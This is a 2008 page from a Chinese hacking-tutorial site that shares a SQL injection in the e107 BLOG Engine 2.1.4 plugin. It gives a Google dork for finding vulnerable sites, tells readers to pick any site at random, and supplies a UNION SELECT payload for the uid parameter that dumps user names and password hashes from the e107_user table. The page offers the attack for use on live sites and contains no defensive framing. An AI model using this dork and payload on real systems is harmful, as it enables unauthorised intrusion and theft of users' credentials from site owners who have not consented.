网站0day分享--e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj - 打造国内专业网络安全动画技术交流站点---黑客动画$黑客教程$安全培训$黑软下载$黑客动画教程$黑客软件$黑客工具$菜鸟入门

首页 ┆ 文章中心 ┆ 黑客工具 ┆ 黑吧学院 ┆ 技术论坛 ┆ 安全培训 ┆ 免费频道 ┆ 最近更新 ┆ 瑞星在线杀毒 ┆ 黑吧百度 ┆ 繁體中文


			设为首页加入收藏发布作品

栏目导航

· 漏洞利用	· 脚本注入
· 入侵实例	· 编程代码
· 逆向工程

网站0day分享--e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj

作者：佚名来源：转载发布时间：2008-11-2 23:09:34 发布人：黑客动画吧

减小字体增大字体

转载请注明：天阳网络技术联盟 http://bbs.tian6.com
其实这个洞是幻影发的。。。。。
这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj PHP远程注入漏洞，非常的简单。

首先用GOOGLE搜索：

[Copy to clipboard] [ - ]CODE:
allinurl:"macgurublog.php?uid="
在里面随便选择一个站，打开后在UID=后输入：

[Copy to clipboard] [ - ]CODE:
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

[ ] [返回上一页] [打印] [收藏]

上一篇文章：cfm的cmdshell使用注意

下一篇文章：php实现base64加密解密

关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布